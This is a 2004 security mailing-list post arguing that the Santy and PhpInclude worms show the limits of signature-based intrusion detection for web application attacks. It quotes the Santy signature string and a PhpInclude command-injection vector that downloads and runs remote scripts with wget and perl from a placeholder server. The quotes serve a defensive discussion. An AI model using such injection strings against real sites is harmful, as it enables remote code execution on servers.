WebApp Sec mailing list archives
The Santy worm and Application Security
From: "Ofer Shezaf" <Ofer.Shezaf () breach com>
Date: Mon, 27 Dec 2004 12:41:10 -0500
Hi All, As an application security professional I've always been frustrated, as I'm sure many of you have been, with the lack of understanding of application security among IT professionals. Many think that solving application security issues only requires an IPS/IDS, VA and patching. Only a few out there really understand the depth of the problem as presented in the OWASP top 10. The Santy worm is a turning point in this respect. As Santy and "PhpInclude", its successor, are application layer attacks ("PHP injection" and "command injection" respectively) they stretch signature based technology to its limits and require signatures that are easy to evade and are prone to generate false positives. Just think how many different ways the Santy attack vector used as a snort signature <<<'&highlight=%2527%252Esystem('>>> can be modified to evade an IDS (manually or automatically). "PhpInclude" is even more interesting as it does not address a specific vulnerability but tries to exploit a known flawed technique used to write PHP code. It tries to change arbitrary parameters of a PHP script to a command injection string, expecting that in some cases these parameters will be used in a PHP include statement. It is probably the first worm to exploit a OWASP top 10 security problem and not a specific voluntarily. The "phpInclude" attack vector is varying but has the general form <<<cmd=cd /tmp;wget *server*/spybot.txt;wget *server*/worm1.txt; perl worm1.txt>>>. A signature based system may look for the signatures such as "perl", "cmd" or "wget" but they are way too short and simplistic to evade false positives. "Santy" and "phpInclude" emphasize the need for real application security measurements such as code review, application layer scanning and real time application layer security. An interesting solution for real time protection is application layer signatures. Such signatures predict better application layer attacks. To do so they have to be contextual (i.e. confined to field values), normalized and correlated to other attack indicators such as abnormal behavior or multiple signature match during the session's requests and responses. While I'm not writing this all as a marketing pitch, some of these ideas are implemented in my company's products ;-) I'd be happy to hear what the other pros here have to say about this. ~ Ofer Ofer Shezaf, CTO Breach Security, Inc. Deployable Application Security http://www.breach.com Tel: +972.9.956.0036 ext.212 Cell: +972.54.443.1119 ofers () breach com
Current thread:
- The Santy worm and Application Security Ofer Shezaf (Dec 28)
- RE: The Santy worm and Application Security xxradar (Dec 30)